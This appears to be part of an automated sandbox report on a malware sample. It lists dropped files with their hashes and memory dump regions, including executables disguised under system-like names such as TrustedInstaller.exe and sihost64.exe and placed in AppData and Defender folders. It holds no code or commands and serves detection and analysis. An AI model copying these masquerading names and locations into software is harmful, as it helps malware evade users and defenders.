MD5 7a86ce1a899262dd3c1df656bff3fb2c
SHA1 33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541
SHA256 b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c
SHA512 421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat

MD5 81c6a00913630266cef3d07065db9b1f
SHA1 db6260ef38563ec05f910277af358fbaa2387154
SHA256 5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4
SHA512 a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

memory/2556-520-0x0000000000550000-0x00000000006E6000-memory.dmp

C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/2556-537-0x000000001B740000-0x000000001B8E9000-memory.dmp

memory/5428-569-0x0000000000550000-0x000000000072A000-memory.dmp

memory/5428-571-0x00000000027C0000-0x00000000027CE000-memory.dmp

memory/5428-573-0x00000000029B0000-0x00000000029CC000-memory.dmp

memory/5428-575-0x000000001B3B0000-0x000000001B3C8000-memory.dmp

memory/5428-577-0x0000000002860000-0x000000000286C000-memory.dmp

memory/6104-584-0x000000001DB30000-0x000000001DCF2000-memory.dmp

memory/6104-658-0x000000001E830000-0x000000001ED58000-memory.dmp

memory/5428-761-0x000000001BD40000-0x000000001BEE9000-memory.dmp

memory/5428-760-0x000000001B860000-0x000000001B92D000-memory.dmp

memory/6104-882-0x000000001E300000-0x000000001E4A9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6019bc03fe1dc3367a67c76d08b55399
SHA1 3d0b6d4d99b6b8e49829a3992072c3d9df7ad672
SHA256 7f88db7b83b11cd8ea233efc3a1498635b68771482658255750df564a065f7d0
SHA512 6b5409780a23e977b0bbe463e351f1d474539100aeaa01b0b7fe72aa6dbfb3c0fec64fe9db65b63d188a279b65eae7f31ef0b6880c67ada9ab175da419f595eb

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

MD5 26e388ea32df635cd424decb2bff563e
SHA1 510ac8024dd524f7ebc92210b189804921fd29ee
SHA256 cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e
SHA512 b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

memory/2568-973-0x00007FFA562C3000-0x00007FFA562C5000-memory.dmp

memory/5564-975-0x000000001D200000-0x000000001D3A9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 c1a4a4340b4aaf6b72487d4d011fdee9
SHA1 c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256 858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA512 76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

memory/6300-1020-0x000000001CFF0000-0x000000001D0BD000-memory.dmp

memory/6300-1019-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/5772-1038-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1036-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1044-0x0000000002330000-0x0000000002350000-memory.dmp

memory/5772-1048-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1050-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1049-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1047-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1051-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1114-0x0000000140000000-0x0000000140786000-memory.dmp

memory/6556-1184-0x00000283ACDF0000-0x00000283ACDF6000-memory.dmp

memory/6556-1185-0x00000283AE910000-0x00000283AE916000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1GM0ipPvd9

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\mZIUi6AW76

MD5 20698b0aeafa51b961cd383ef3f99ccb
SHA1 a81cf3b3e1da80e1a99faf0cc47e6f93087b755c
SHA256 9e58a7cfc4125c430dc8aa17d4aaeac7646efc556bb26f859559b957f68240dd
SHA512 85bf507f86a743343141d0654ab47db8ccf1674de25e742be7c5f3925befcaac917b5e65d8b9a9272de05c250dd442e0b1bcdae68947c7e418adebde9f2e37fe

C:\Users\Admin\AppData\Local\Temp\NInF07QEZ5

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\hOlA4rmdHM

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/5772-1373-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1375-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1374-0x0000000140000000-0x0000000140786000-memory.dmp

memory/6300-1432-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/6668-2096-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/7140-2113-0x0000000000010000-0x0000000000018000-memory.dmp

memory/2648-2226-0x0000000000400000-0x0000000000408000-memory.dmp

memory/6720-2299-0x0000000000610000-0x0000000000618000-memory.dmp

memory/7068-2308-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

memory/6300-2324-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/2260-2406-0x0000000000D60000-0x0000000000D68000-memory.dmp

memory/6628-2408-0x0000000000F50000-0x0000000000F58000-memory.dmp

memory/5304-2435-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/688-2503-0x0000000000600000-0x0000000000608000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smss.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

memory/3316-2504-0x0000000000330000-0x0000000000338000-memory.dmp